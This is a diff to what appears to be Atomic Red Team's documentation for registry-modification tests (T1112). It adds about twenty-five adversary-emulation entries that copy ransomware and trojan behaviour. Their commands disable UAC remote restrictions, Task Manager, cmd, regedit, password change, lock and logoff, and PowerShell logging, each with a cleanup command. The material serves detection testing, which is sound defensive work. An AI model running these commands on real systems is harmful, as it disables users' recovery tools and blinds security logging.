+- [Atomic Test #9 - Disable Windows Registry Tool](#atomic-test-9---disable-windows-registry-tool)
+
+- [Atomic Test #10 - Disable Windows CMD application](#atomic-test-10---disable-windows-cmd-application)
+
+- [Atomic Test #11 - Disable Windows Task Manager application](#atomic-test-11---disable-windows-task-manager-application)
+
+- [Atomic Test #12 - Disable Windows Notification Center](#atomic-test-12---disable-windows-notification-center)
+
+- [Atomic Test #13 - Disable Windows Shutdown Button](#atomic-test-13---disable-windows-shutdown-button)
+
+- [Atomic Test #14 - Disable Windows LogOff Button](#atomic-test-14---disable-windows-logoff-button)
+
+- [Atomic Test #15 - Disable Windows Change Password Feature](#atomic-test-15---disable-windows-change-password-feature)
+
+- [Atomic Test #16 - Disable Windows Lock Workstation Feature](#atomic-test-16---disable-windows-lock-workstation-feature)
+
+- [Atomic Test #17 - Activate Windows NoDesktop Group Policy Feature](#atomic-test-17---activate-windows-nodesktop-group-policy-feature)
+
+- [Atomic Test #18 - Activate Windows NoRun Group Policy Feature](#atomic-test-18---activate-windows-norun-group-policy-feature)
+
+- [Atomic Test #19 - Activate Windows NoFind Group Policy Feature](#atomic-test-19---activate-windows-nofind-group-policy-feature)
+
+- [Atomic Test #20 - Activate Windows NoControlPanel Group Policy Feature](#atomic-test-20---activate-windows-nocontrolpanel-group-policy-feature)
+
+- [Atomic Test #21 - Activate Windows NoFileMenu Group Policy Feature](#atomic-test-21---activate-windows-nofilemenu-group-policy-feature)
+
+- [Atomic Test #22 - Activate Windows NoClose Group Policy Feature](#atomic-test-22---activate-windows-noclose-group-policy-feature)
+
+- [Atomic Test #23 - Activate Windows NoSetTaskbar Group Policy Feature](#atomic-test-23---activate-windows-nosettaskbar-group-policy-feature)
+
+- [Atomic Test #24 - Activate Windows NoTrayContextMenu Group Policy Feature](#atomic-test-24---activate-windows-notraycontextmenu-group-policy-feature)
+
+- [Atomic Test #25 - Activate Windows NoPropertiesMyDocuments Group Policy Feature](#atomic-test-25---activate-windows-nopropertiesmydocuments-group-policy-feature)
+
+- [Atomic Test #26 - Hide Windows Clock Group Policy Feature](#atomic-test-26---hide-windows-clock-group-policy-feature)
+
+- [Atomic Test #27 - Windows HideSCAHealth Group Policy Feature](#atomic-test-27---windows-hidescahealth-group-policy-feature)
+
+- [Atomic Test #28 - Windows HideSCANetwork Group Policy Feature](#atomic-test-28---windows-hidescanetwork-group-policy-feature)
+
+- [Atomic Test #29 - Windows HideSCAPower Group Policy Feature](#atomic-test-29---windows-hidescapower-group-policy-feature)
+
+- [Atomic Test #30 - Windows HideSCAVolume Group Policy Feature](#atomic-test-30---windows-hidescavolume-group-policy-feature)
+
+- [Atomic Test #31 - Windows Modify Show Compress Color And Info Tip Registry](#atomic-test-31---windows-modify-show-compress-color-and-info-tip-registry)
+
+- [Atomic Test #32 - Windows Powershell Logging Disabled](#atomic-test-32---windows-powershell-logging-disabled)
+
 
 <br/>
 
@@ -282,9 +332,868 @@ cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPaths
 
 #### Cleanup Commands:
 ```cmd
-reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f 2>&1
-reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f 2>&1
-reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f 2>&1
+reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f >nul 2>&1
+reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f >nul 2>&1
+reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #8 - BlackByte Ransomware Registry Changes - Powershell
+This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
+The steps are as follows:
+<ol>
+    <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
+    <li>2. Enable OS to share network connections between different privilege levels</li>
+    <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
+</ol>
+The registry keys and their respective values will be created upon successful execution.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 0b79c06f-c788-44a2-8630-d69051f1123d
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -PropertyType DWord -Value 1 -Force
+New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force
+New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force -ErrorAction Ignore
+Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force -ErrorAction Ignore
+Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force -ErrorAction Ignore
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #9 - Disable Windows Registry Tool
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry.
+See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\policies\system" -Name DisableRegistryTools -ErrorAction Ignore
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #10 - Disable Windows CMD application
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows CMD application.
+See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d2561a6d-72bd-408c-b150-13efe1801c2a
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+New-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" -Name DisableCMD -Value 1
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" -Name DisableCMD -ErrorAction Ignore
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #11 - Disable Windows Task Manager application
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application.
+See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** af254e70-dd0e-4de6-9afe-a994d9ea8b62
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #12 - Disable Windows Notification Center
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center.
+See how remcos rat abuses this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c0d6d67f-1f63-42cc-95c0-5fd6b20082ad
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #13 - Disable Windows Shutdown Button
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button.
+See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 6e0d1131-2d7e-4905-8ca5-d6172f05d03d
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #14 - Disable Windows LogOff Button
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button.
+See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** e246578a-c24d-46a7-9237-0213ff86fb0c
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /t REG_DWORD /d 1 /f
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /f >nul 2>&1
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #15 - Disable Windows Change Password Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature.
+See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d4a6da40-618f-454d-9a9e-26af552aaeb0
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #16 - Disable Windows Lock Workstation Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature.
+See how ransomware abuses this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #17 - Activate Windows NoDesktop Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to hide all icons on Desktop Group Policy. 
+Take note that some Group Policy changes might require a restart to take effect.
+See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 93386d41-525c-4a1b-8235-134a628dee17
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #18 - Activate Windows NoRun Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Run menu from Start Menu Group Policy.
+Take note that some Group Policy changes might require a restart to take effect.
+See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d49ff3cc-8168-4123-b5b3-f057d9abbd55
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /f
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #19 - Activate Windows NoFind Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Search menu from Start Menu Group Policy.
+Take note that some Group Policy changes might require a restart to take effect.
+See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ffbb407e-7f1d-4c95-b22e-548169db1fbd
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #20 - Activate Windows NoControlPanel Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to Disable Control Panel Group Policy. 
+Take note that some Group Policy changes might require a restart to take effect.
+See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** a450e469-ba54-4de1-9deb-9023a6111690
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #21 - Activate Windows NoFileMenu Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to Remove File menu from Windows Explorer Group Policy. 
+Take note that some Group Policy changes might require a restart to take effect.
+See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #22 - Activate Windows NoClose Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to Disable and remove the Shut Down command Group Policy. 
+Take note that some Group Policy changes might require a restart to take effect.
+See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 12f50e15-dbc6-478b-a801-a746e8ba1723
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #23 - Activate Windows NoSetTaskbar Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to Disable changes to Taskbar and Start Menu Settings Group Policy. 
+Take note that some Group Policy changes might require a restart to take effect.
+See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d29b7faf-7355-4036-9ed3-719bd17951ed
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetTaskbar /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetTaskbar /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #24 - Activate Windows NoTrayContextMenu Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to Disable context menu for taskbar Group Policy. 
+Take note that some Group Policy changes might require a restart to take effect.
+See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 4d72d4b1-fa7b-4374-b423-0fe326da49d2
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #25 - Activate Windows NoPropertiesMyDocuments Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to hide Properties from "My Documents icon" Group Policy. 
+Take note that some Group Policy changes might require a restart to take effect.
+See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 20fc9daa-bd48-4325-9aff-81b967a84b1d
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /t REG_DWORD /d 1
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #26 - Hide Windows Clock Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to Hide Clock Group Policy. 
+Take note that some Group Policy changes might require a restart to take effect.
+See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 8023db1e-ad06-4966-934b-b6a0ae52689e
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #27 - Windows HideSCAHealth Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to remove security and maintenance icon Group Policy. 
+Take note that some Group Policy changes might require a restart to take effect.
+See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** a4637291-40b1-4a96-8c82-b28f1d73e54e
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAHealth /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAHealth /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #28 - Windows HideSCANetwork Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to remove the networking icon Group Policy. 
+Take note that some Group Policy changes might require a restart to take effect.
+See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3e757ce7-eca0-411a-9583-1c33b8508d52
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCANetwork /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCANetwork /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #29 - Windows HideSCAPower Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to remove the battery icon Group Policy. 
+Take note that some Group Policy changes might require a restart to take effect.
+See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 8d85a5d8-702f-436f-bc78-fcd9119496fc
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAPower /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAPower /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #30 - Windows HideSCAVolume Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to remove the volume icon Group Policy. 
+Take note that some Group Policy changes might require a restart to take effect..
+See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7f037590-b4c6-4f13-b3cc-e424c5ab8ade
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAVolume /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAVolume /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #31 - Windows Modify Show Compress Color And Info Tip Registry
+Modify the registry of the currently logged in user using reg.exe via cmd console to show compress color and show tips feature. 
+See how hermeticwiper uses this technique - https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 795d3248-0394-4d4d-8e86-4e8df2a2693f
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /t REG_DWORD /d 0 /f
+reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1
+reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #32 - Windows Powershell Logging Disabled
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable Powershell Module Logging, Script Block Logging, Transcription and Script Execution
+see https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableModuleLogging
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 95b25212-91a7-42ff-9613-124aca6845a8
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f
+reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f
+reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f
+reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /f >nul 2>&1
+reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /f >nul 2>&1
+reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /f >nul 2>&1
+reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /f >nul 2>&1
 ```
 
 

atomics/T1112/T1112.yaml

@@ -127,9 +127,392 @@ atomic_tests:
